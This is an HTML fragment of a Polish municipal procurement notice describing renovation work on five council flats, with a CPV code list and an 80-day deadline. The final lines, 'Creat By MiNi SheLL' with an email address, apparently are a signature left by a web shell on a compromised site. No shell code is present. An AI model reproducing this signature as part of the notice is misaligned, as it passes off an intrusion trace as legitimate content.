<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 80.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ul. Szarotki 12/15, ul. Asnyka 17/4, ul. Kapitańska 8a/13, ul. Kołłątaja 24/16, ul. Wyzwolenia 80/3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie remontu komunalnych lokali mieszkalnych - ul. Szarotki 12/15, ul. Asnyka 17/4, ul. Kapitańska 8a/13, ul. Kołłątaja 24/16, ul. Wyzwolenia 80/3
2.	Zakres remontu poszczególnych lokali mieszkalnych

1)	w budynku przy ul. Szarotki 12/15 (powierzchnia użytkowa lokalu - 43,87 m2):
a)	w branży budowlanej - malowanie farbą emulsyjną tynków wewnętrznych, montaż czujnika czadu, przestawienie pieca kaflowego, naprawa posadzki, wywiezienie gruzu
b)	w branży sanitarnej - próba instalacji gazowej, montaż wodomierza,
c)	w branży elektrycznej - wymiana instalacji elektrycznej, osprzętu i WLZ, pomiary rezystancji izolacji instalacji elektrycznej

2)	w budynku przy ul. Asnyka 17/4 (powierzchnia użytkowa lokalu - 20,31 m2):
a)	w branży budowlanej - osuszenie lokalu, przestawienie pieca kaflowego, malowanie farbą emulsyjną tynków wewnętrznych, wraz z robotami towarzyszącymi, wywiezienie gruzu, dopasowanie i regulacja okien
b)	w branży sanitarnej - wymiana wodomierza, zlewu, ustępu, kurka gazowego, próba  instalacji gazowej, montaż czujnika czadu,
c)	w branży elektrycznej - próba rezystancji izolacji instalacji elektrycznej.

3)	w budynku przy ul. Kapitańskiej 8a/13 (powierzchnia użytkowa lokalu - 43,07 m2):
a)	w branży budowlanej - malowanie farbą emulsyjną tynków wewnętrznych wraz z robotami towarzyszącymi, szklenie okien, wywóz gruzu,
b)	w branży sanitarnej  - wymiana zmywaka kuchennego, ustępu, montaż wodomierza, próba instalacji gazowej, demontaż termy elektrycznej
c)	w branży elektrycznej - nie występuje,

4) w budynku przy ul. Kołłątaja 24/16 (powierzchnia użytkowa lokalu - 30,96 m2 ):
a)	w branży budowlanej - przestawienie pieca kaflowego, wymiana skrzydła drzwiowego, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych wraz z robotami towarzyszącymi, naprawa posadzki, dopasowanie skrzydeł okiennych, wywóz gruzu,
b)	w branży sanitarnej - wymiana wodomierza, kuchenki gazowej, próba instalacji gazowej, montaż czujnika czadu,
c)	w branży elektrycznej - wymiana instalacji, osprzętu, tablicy licznikowej, pomiar rezystancji izolacji instalacji elektrycznej.

5) w budynku przy ul. Wyzwolenia 80/3 (powierzchnia użytkowa lokalu - 44,15 m2 ):
a)	w branży budowlanej - malowanie wraz z robotami towarzyszącymi, dopasowanie skrzydeł drzwiowych, wywiezienie gruzu,
b)	w branży sanitarnej - wymiana zlewu, syfonu i wodomierza, demontaż wanny, próba instalacji gazowej,
c)	w branży elektrycznej - wymiana przewodów i osprzętu elektrycznego, pomiar rezystancji izolacji instalacji elektrycznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.41-1, 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 80.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com